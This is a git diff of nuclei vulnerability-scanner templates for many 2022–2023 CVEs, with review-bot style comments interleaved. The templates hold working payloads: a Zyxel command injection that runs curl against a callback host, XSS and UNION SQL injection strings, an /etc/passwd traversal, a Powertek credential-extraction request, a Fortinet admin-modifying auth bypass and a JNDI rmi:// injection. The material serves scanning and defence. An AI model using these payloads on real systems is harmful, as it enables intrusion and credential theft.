+ An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
+ reference:
+ - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
+ - https://github.com/rapid7/metasploit-framework/pull/16563
+ - https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-30525
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-30525
+ cwe-id: CWE-78
+ metadata:
+ shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700"
+ tags: zyxel,cve,cve2022,firewall,unauth,kev,msf,rce
+
+requests:
+ - raw:
+ - |
+ POST /ztp/cgi-bin/handler HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+
+ {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{interactsh-url}};","data":"hi"}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
+
+ - type: status
+ status:
+ - 500
+
+# Enhanced by mp on 2022/05/19
diff --git a/nuclei-templates/CVE-2022/cve-2022-30777.yaml b/nuclei-templates/CVE-2022/cve-2022-30777.yaml
new file mode 100644
index 0000000000..c7b81333ed
--- /dev/null
+++ b/nuclei-templates/CVE-2022/cve-2022-30777.yaml
@@ -0,0 +1,46 @@
+id: CVE-2022-30777
+
+info:
+ name: Parallels H-Sphere 3.6.1713 - Cross-Site Scripting
+ author: 3th1c_yuk1
+ severity: medium
+ description: |
+ Parallels H-Sphere 3.6.1713 contains a cross-site scripting vulnerability via the index_en.php 'from' parameter.
+ reference:
+ - https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59
+ - https://en.wikipedia.org/wiki/H-Sphere
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-30777
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2022-30777
+ cwe-id: CWE-79
+ metadata:
+ shodan-query: title:"h-sphere"
+ verified: "true"
+ tags: cve,cve2022,parallels,hsphere,xss
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+ - '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - '<TITLE>"><script>alert(document.domain)</script>'
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/09/14
diff --git a/nuclei-templates/CVE-2022/cve-2022-31373.yaml b/nuclei-templates/CVE-2022/cve-2022-31373.yaml
deleted file mode 100644
index 8c1c21231b..0000000000
--- a/nuclei-templates/CVE-2022/cve-2022-31373.yaml
+++ /dev/null
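Review bot: In cve-2022-30777.yaml there is a stray blank line between `matchers:` and the first `- type: word` entry, which no other template in this commit has; remove it for consistency. The `description` names only `index_en.php`, while the path list also probes `index.php` under `stop-at-first-match: true`, so the report cannot tell a triager which page reflected the marker — either add `index.php` to the description or drop the second path. The `<TITLE>` body match has no `part: body`, which the sibling templates spell out explicitly.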
@@ -1,45 +0,0 @@ -id: CVE-2022-31373 - -info: - name: SolarView Compact 6.00 - Cross-Site Scripting - author: ritikchaddha - severity: medium - description: | - SolarView Compact 6.00 contains a cross-site scripting vulnerability via Solar_AiConf.php. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. - reference: - - https://github.com/badboycxcc/SolarView_Compact_6.0_xss - - https://nvd.nist.gov/vuln/detail/CVE-2022-31373 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-31373 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"SolarView Compact" - verified: "true" - tags: cve,cve2022,xss,solarview - -requests: - - method: GET - path: - - '{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '/Solar_AiConf.php/"><script>alert(document.domain)</script>' - - 'HREF="Solar_Service.php"' - condition: and - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/28 diff --git a/nuclei-templates/CVE-2022/cve-2022-32007.yaml b/nuclei-templates/CVE-2022/cve-2022-32007.yaml deleted file mode 100644 index fee1101dd8..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-32007.yaml +++ /dev/null 
@@ -1,44 +0,0 @@ -id: CVE-2022-32007 - -info: - name: Complete Online Job Search System 1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/admin/company/index.php?view=edit&id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-2.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32007 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32007 - cwe-id: CWE-89 - metadata: - verified: "true" - tags: cve,cve2022,sqli,eris,authenticated - -variables: - num: "999999999" - -requests: - - raw: - - | - POST /admin/login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - user_email={{username}}&user_pass={{password}}&btnLogin= - - - | - GET /admin/company/index.php?view=edit&id=-3%27%20union%20select%201,md5({{num}}),3,4,5,6--+ HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - -# Enhanced by mp on 2022/09/28 diff --git a/nuclei-templates/CVE-2022/cve-2022-32018.yaml b/nuclei-templates/CVE-2022/cve-2022-32018.yaml deleted file mode 100644 index b9819f6aa3..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-32018.yaml +++ /dev/null 
@@ -1,35 +0,0 @@ -id: CVE-2022-32018 - -info: - name: Complete Online Job Search System 1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=hiring&search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-12.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32018 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32018 - cwe-id: CWE-89 - metadata: - verified: "true" - tags: cve,cve2022,sqli - -variables: - num: "999999999" - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+" - - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - -# Enhanced by mp on 2022/09/28 diff --git a/nuclei-templates/CVE-2022/cve-2022-32024.yaml b/nuclei-templates/CVE-2022/cve-2022-32024.yaml deleted file mode 100644 index 702a2df8ed..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-32024.yaml +++ /dev/null 
@@ -1,52 +0,0 @@ -id: CVE-2022-32024 - -info: - name: Car Rental Management System 1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Car Rental Management System 1.0 contains an SQL injection vulnerability via /booking.php?car_id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-4.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32024 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32024 - cwe-id: CWE-89 - metadata: - comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. - shodan-query: http.html:"Car Rental Management System" - verified: "true" - tags: cve,cve2022,carrental,cms,sqli,authenticated - -variables: - num: "999999999" - -requests: - - raw: - - | - POST /admin/ajax.php?action=login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}&password={{password}} - - - | - GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1 - Host: {{Hostname}} - - skip-variables-check: true - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - - - type: status - status: - - 200 - -# Enhanced by md on 2022/09/26 diff --git a/nuclei-templates/CVE-2022/cve-2022-32025.yaml b/nuclei-templates/CVE-2022/cve-2022-32025.yaml new file mode 100644 index 0000000000..aaeeb7a420 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-32025.yaml 
@@ -0,0 +1,54 @@ +id: CVE-2022-32025 + +info: + name: Car Rental Management System 1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/view_car.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-6.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32025 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32025 + cwe-id: CWE-89 + metadata: + comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. + shodan-query: http.html:"Car Rental Management System" + verified: "true" + tags: cve,cve2022,carrental,cms,sqli,authenticated + +variables: + num: "999999999" + +requests: + - raw: + - | + POST /admin/ajax.php?action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}%23&password={{password}} + + - | + GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1 + Host: {{Hostname}} + + skip-variables-check: true + host-redirects: true + max-redirects: 2 + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + + - type: status + status: + - 200 + +# Enhanced by md on 2022/09/26 diff --git a/nuclei-templates/CVE-2022/cve-2022-32028.yaml b/nuclei-templates/CVE-2022/cve-2022-32028.yaml deleted file mode 100644 index b598d48ce0..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-32028.yaml +++ /dev/null 
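Review bot: The login request's `username={{username}}%23&password={{password}}` differs from the sibling car-rental templates in this commit, which send `username={{username}}&password={{password}}`; the appended `%23` is not explained by `metadata.comment` (which describes a different string), so either document why it is there or align the line with the siblings. Whether the login succeeds without it cannot be determined from the diff. The file also keeps the legacy `requests:` key and the quoted `verified: "true"`, while the other templates added in this commit (CVE-2023-35047, CVE-2023-46818, CVE-2024-23897) use `http:`, a bare boolean and a `max-request` count; for this two-request template that would be `max-request: 2`.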
@@ -1,54 +0,0 @@ -id: CVE-2022-32028 - -info: - name: Car Rental Management System 1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32028 - cwe-id: CWE-89 - metadata: - comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. - shodan-query: http.html:"Car Rental Management System" - verified: "true" - tags: cve,cve2022,carrental,cms,sqli,authenticated - -variables: - num: "999999999" - -requests: - - raw: - - | - POST /admin/ajax.php?action=login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}&password={{password}} - - - | - GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1 - Host: {{Hostname}} - - skip-variables-check: true - host-redirects: true - max-redirects: 2 - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - - - type: status - status: - - 200 - -# Enhanced by md on 2022/09/26 diff --git a/nuclei-templates/CVE-2022/cve-2022-32409.yaml b/nuclei-templates/CVE-2022/cve-2022-32409.yaml deleted file mode 100644 index 45a9d0ff2e..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-32409.yaml +++ /dev/null 
@@ -1,38 +0,0 @@ -id: CVE-2022-32409 - -info: - name: Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion - author: pikpikcu - severity: critical - description: Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request. - reference: - - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt - - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion - - https://nvd.nist.gov/vuln/detail/CVE-2022-32409 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-32409 - cwe-id: CWE-94 - metadata: - shodan-query: http.html:"i3geo" - verified: "true" - tags: cve,cve2022,i3geo,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/22 diff --git a/nuclei-templates/CVE-2022/cve-2022-32444.yaml b/nuclei-templates/CVE-2022/cve-2022-32444.yaml new file mode 100644 index 0000000000..fe206ab90c --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-32444.yaml 
@@ -0,0 +1,27 @@ +id: CVE-2022-32444 + +info: + name: u5cms v8.3.5- Open Redirect + author: 0x_Akoko + severity: medium + description: An issue was discovered in u5cms verion 8.3.5 There is a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php. + reference: + - https://github.com/u5cms/u5cms/issues/50 + - https://www.cvedetails.com/cve/CVE-2022-32444 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-32444 + cwe-id: CWE-601 + tags: cve,cve2022,redirect,u5cms,cms + +requests: + - method: GET + path: + - '{{BaseURL}}/loginsave.php?u=http://example.com' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2022/cve-2022-33174.yaml b/nuclei-templates/CVE-2022/cve-2022-33174.yaml deleted file mode 100644 index 59e665b041..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-33174.yaml +++ /dev/null 
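Review bot: The description contains the typo `verion` and the name `u5cms v8.3.5- Open Redirect` lacks the space before the dash; suggest `An issue was discovered in u5cms version 8.3.5. ...` and `name: u5cms v8.3.5 - Open Redirect`. The template has no `metadata` block (no `max-request`, no `verified`) and cites cvedetails where the other CVE templates in this commit cite the NVD entry. The trailing `# https://regex101.com/r/ZDYhFh/1` after the quoted regex is valid YAML, but it would read better on its own line above the matcher.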
@@ -1,49 +0,0 @@ -id: CVE-2022-33174 - -info: - name: Powertek Firmware <3.30.30 - Authorization Bypass - author: pikpikcu - severity: high - description: | - Powertek firmware (multiple brands) before 3.30.30 running Power Distribution Units are vulnerable to authorization bypass in the web interface. To exploit the vulnerability, an attacker must send an HTTP packet to the data retrieval interface (/cgi/get_param.cgi) with the tmpToken cookie set to an empty string followed by a semicolon. This bypasses an active session authorization check. This can be then used to fetch the values of protected sys.passwd and sys.su.name fields that contain the username and password in cleartext. - reference: - - https://gynvael.coldwind.pl/?lang=en&id=748 - - https://nvd.nist.gov/vuln/detail/CVE-2022-33174 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-33174 - cwe-id: CWE-863 - metadata: - shodan-query: http.html:"Powertek" - verified: "true" - tags: cve,cve2022,powertek,auth-bypass - -requests: - - raw: - - | - GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1 - Host: {{Hostname}} - Cookie: tmpToken=; - - matchers-condition: and - matchers: - - - type: word - words: - - '<sys.passwd>' - - '<sys.su.name>' - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '<sys\.passwd>([A-Z0-9a-z]+)<\/sys\.passwd>' - - '<sys\.su\.name>([a-z]+)<\/sys\.su\.name>' - -# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2022/cve-2022-34049.yaml b/nuclei-templates/CVE-2022/cve-2022-34049.yaml new file mode 100644 index 0000000000..8348fca99e --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-34049.yaml 
@@ -0,0 +1,46 @@ +id: CVE-2022-34049 + +info: + name: Wavlink Exportlogs.sh - Configuration Exposure + author: For3stCo1d + severity: medium + description: | + An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows unauthenticated attackers to download log files and configuration data. + reference: + - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34049 + - https://drive.google.com/file/d/1ZeSwqu04OghLQXeG7emU-w-Amgadafqx/view?usp=sharing + - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view?usp=sharing + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2022-34049 + cwe-id: CWE-552 + metadata: + shodan-query: http.title:"Wi-Fi APP Login" + verified: "true" + tags: cve,cve2022,wavlink,router,exposure + +requests: + - raw: + - | + GET /cgi-bin/ExportLogs.sh HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Login' + - 'Password' + condition: and + + - type: word + part: header + words: + - filename="sysLogs.txt" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/cve-2022-35416.yaml b/nuclei-templates/CVE-2022/cve-2022-35416.yaml deleted file mode 100644 index 90b8578414..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-35416.yaml +++ /dev/null 
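Review bot: The `reference` list contains the same Google Drive file twice (`https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view` with and without `?usp=sharing`); drop one of them. The body matcher on the generic words `Login` and `Password` is the weakest part of the match, and the `filename="sysLogs.txt"` header check is what actually identifies the exported log; a comment above the matchers such as `# header filename identifies the export; body words only confirm credential-related entries` would help whoever tunes it later. `verified: "true"` is a quoted string here while the newer templates in this commit use the bare boolean.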
@@ -1,46 +0,0 @@ -id: CVE-2022-35416 - -info: - name: H3C SSL VPN <=2022-07-10 - Cross-Site Scripting - author: 0x240x23elu - severity: medium - description: | - H3C SSL VPN 2022-07-10 and prior contains a cookie-based cross-site scripting vulnerability in wnm/login/login.json svpnlang. - reference: - - https://github.com/advisories/GHSA-9x76-78gc-r3m9 - - https://github.com/Docker-droid/H3C_SSL_VPN_XSS - - https://nvd.nist.gov/vuln/detail/CVE-2022-35416 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-35416 - cwe-id: CWE-79 - metadata: - shodan-query: http.html_hash:510586239 - verified: "true" - tags: cve,cve2022,xss,vpn,h3c - -requests: - - raw: - - | - GET /wnm/login/login.json HTTP/1.1 - Host: {{Hostname}} - Cookie: svpnlang=<script>alert('document.domain')</script> - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "<script>alert('document.domain')</script>" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-40684.yaml b/nuclei-templates/CVE-2022/cve-2022-40684.yaml new file mode 100644 index 0000000000..c2bb50aeb8 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-40684.yaml 
@@ -0,0 +1,61 @@ +id: CVE-2022-40684 + +info: + name: Fortinet - Authentication Bypass + author: Shockwave,nagli,carlosvieira + severity: critical + description: | + Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py + - https://securityonline.info/researchers-have-developed-cve-2022-40684-poc-exploit-code/ + - https://socradar.io/what-do-you-need-to-know-about-fortinet-critical-authentication-bypass-vulnerability-cve-2022-40684/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684 + - https://nvd.nist.gov/vuln/detail/CVE-2022-40684 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-40684 + cwe-id: CWE-306 + tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev + +requests: + - raw: + - | + GET /api/v2/cmdb/system/admin HTTP/1.1 + Host: {{Hostname}} + User-Agent: Node.js + Forwarded: by="[127.0.0.1]:1337";for="[127.0.0.1]:1337";proto=http;host= + X-Forwarded-Vdom: root + + - | + PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 + Host: {{Hostname}} + User-Agent: Report Runner + Content-Type: application/json + Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000; + Content-Length: 610 + + { + "ssh-public-key1":"{{randstr}}" + } + + stop-at-first-match: true + req-condition: true + matchers-condition: or + matchers: + - type: word + part: body_1 + words: + - "ENC XXXX" + - "http_method" + condition: and + + - type: word + part: body_2 + words: + - 'Invalid SSH public key.' 
+ - 'cli_error' + condition: and + +# Enhanced by md on 2022/10/19 diff --git a/nuclei-templates/CVE-2022/CVE-2022-42889.yaml b/nuclei-templates/CVE-2022/cve-2022-42889.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-42889.yaml rename to nuclei-templates/CVE-2022/cve-2022-42889.yaml diff --git a/nuclei-templates/CVE-2023/CVE-2023-25194.yaml b/nuclei-templates/CVE-2023/CVE-2023-25194.yaml deleted file mode 100644 index 344fe9f3b0..0000000000 --- a/nuclei-templates/CVE-2023/CVE-2023-25194.yaml +++ /dev/null 
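Review bot: The PUT request carries a hard-coded `Content-Length: 610` that cannot match its short JSON body built from `{{randstr}}`; as far as I recall nuclei recomputes the length for non-unsafe raw requests, but the stale header misleads anyone reading or replaying the template, so drop it. The PUT is also the only state-changing step, and its expected outcome is rejection (`Invalid SSH public key.`); a comment above the second raw request such as `# fallback probe: the random value is expected to be rejected, so no admin config is changed` would make that intent explicit. Whether `stop-at-first-match: true` keeps the PUT from being sent once the first GET matched is not something the diff shows; if it does not, the read-only GET matcher should be preferred.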
@@ -1,99 +0,0 @@ -id: CVE-2023-25194 - -info: - name: Apache Druid Kafka Connect - Remote Code Execution - author: j4vaovo - severity: high - description: | - The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25194 - - https://nvd.nist.gov/vuln/detail/CVE-2023-25194 - - https://github.com/nbxiglk0/Note/blob/0ddc14ecd296df472726863aa5d1f0f29c8adcc4/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Java/ApacheDruid/ApacheDruid%20Kafka-rce/ApacheDruid%20Kafka-rce.md#apachedruid-kafka-connect-rce - - http://packetstormsecurity.com/files/173151/Apache-Druid-JNDI-Injection-Remote-Code-Execution.html - - https://kafka.apache.org/cve-list - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2023-25194 - cwe-id: CWE-502 - epss-score: 0.91608 - epss-percentile: 0.98695 - cpe: cpe:2.3:a:apache:kafka_connect:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: apache - product: kafka_connect - shodan-query: html:"Apache Druid" - tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast - -http: - - raw: - - | - POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - { - "type":"kafka", - "spec":{ - "type":"kafka", - "ioConfig":{ - "type":"kafka", - "consumerProperties":{ - "bootstrap.servers":"127.0.0.1:6666", - "sasl.mechanism":"SCRAM-SHA-256", - "security.protocol":"SASL_SSL", - "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"rmi://{{interactsh-url}}:6666/test\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";" - }, - "topic":"test", - "useEarliestOffset":true, - "inputFormat":{ - "type":"regex", - 
"pattern":"([\\s\\S]*)", - "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965", - "columns":[ - "raw" - ] - } - }, - "dataSchema":{ - "dataSource":"sample", - "timestampSpec":{ - "column":"!!!_no_such_column_!!!", - "missingValue":"1970-01-01T00:00:00Z" - }, - "dimensionsSpec":{ - - }, - "granularitySpec":{ - "rollup":false - } - }, - "tuningConfig":{ - "type":"kafka" - } - }, - "samplerConfig":{ - "numRows":500, - "timeoutMs":15000 - } - } - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "dns" - - - type: word - part: body - words: - - 'RecordSupplier' - - - type: status - status: - - 400 -# digest: 4a0a004730450220253e393d9460c536f32f54253122a4cbfbbb890af4cd35b91b95d10e1b94d6b8022100e0a025041c041e62a80292747511e4d1af8e4adbe51386321a14466077c090aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-28432.yaml b/nuclei-templates/CVE-2023/CVE-2023-28432.yaml new file mode 100644 index 0000000000..aba88864c4 --- /dev/null +++ b/nuclei-templates/CVE-2023/CVE-2023-28432.yaml 
@@ -0,0 +1,37 @@ +id: CVE-2023-28432 +info: + name: Minio post policy request security bypass + author: Mr-xn + severity: high + description: Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z. + reference: + - https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q + - https://github.com/minio/minio/pull/16853/files + - https://github.com/golang/vulndb/issues/1667 + - https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-28432 + cwe-id: CWE-200 + tags: cve,cve2023, +requests: + - raw: + - |+ + POST /minio/bootstrap/v1/verify HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"MinioEndpoints"' + - type: word + part: header + words: + - 'Content-Type: text/plain' + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2023/CVE-2023-35047.yaml b/nuclei-templates/CVE-2023/CVE-2023-35047.yaml new file mode 100644 index 